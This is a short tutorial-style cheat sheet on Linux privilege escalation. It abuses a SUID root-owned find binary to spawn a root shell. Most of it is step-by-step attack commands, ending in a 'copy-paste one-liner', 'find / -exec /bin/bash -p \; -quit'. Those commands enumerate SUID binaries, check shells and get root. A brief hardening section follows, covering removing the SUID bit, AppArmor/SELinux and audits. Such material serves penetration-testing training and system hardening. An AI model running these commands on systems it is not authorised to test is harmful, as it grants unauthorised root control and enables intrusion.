🧨 Privilege Escalation via SUID find Binary
🔍 Summary
If the find binary is SetUID and owned by root, you can use it to execute arbitrary commands as root — including spawning a root shell.
🔐 Why It Works
SetUID (
-4000permission) makes a binary execute with the owner’s privileges, not the user's.If a binary is owned by root and SetUID, it will run as root even when called by a low-priv user.
findsupports-execwhich runs arbitrary commands.If you use
findto execute a shell that supports-p(likebash,rbash, orsh),
By default, when bash detects it's being executed as a SetUID binary (e.g., owned by root, but executed by a normal user), it drops privileges for security reasons — meaning it refuses to run with elevated permissions.
the -p flag tells the shell not to drop privileges, giving you a root shell.
🧪 Step-by-Step Exploitation
🔎 1. Find SUID binaries
find / -perm -4000 2>/dev/null
✅ Look for /usr/bin/find
🔍 2. Check if find is root-owned and has SUID
ls -l /usr/bin/find
Output should look like:
-rwsr-xr-x 1 root root ... /usr/bin/find
The s in rws confirms SUID.
🔎 3. Find an executable shell
Check which shells are present:
cat /etc/shells
Then check their permissions:
cat /etc/shells | while read shell; do ls -l $shell 2>/dev/null; done
✅ Look for:
/bin/bash,/bin/sh, or/bin/rbashPreferably symlinks to
bash, which supports the-pflag
🚀 4. Exploit with find + shell
Spawn a root shell:
/usr/bin/find / -exec /bin/bash -p \; -quit
Or:
/usr/bin/find / -exec /bin/rbash -p \; -quit
Confirm you're root:
whoami
🧷 Mitigation (For Hardening Notes)
If you're a defender or auditing a system:
NEVER give SetUID to binaries like
find,vim,cp, etc.Run:
chmod u-s /usr/bin/findUse AppArmor or SELinux to restrict execution
Regularly audit with:
find / -perm -4000 -type f 2>/dev/null
✅ Quick Copy-Paste One-Liner
/usr/bin/find / -exec /bin/bash -p \; -quit
If find isn't available:
ls -l /bin /sbin /usr/bin /usr/sbin 2>/dev/null | grep rws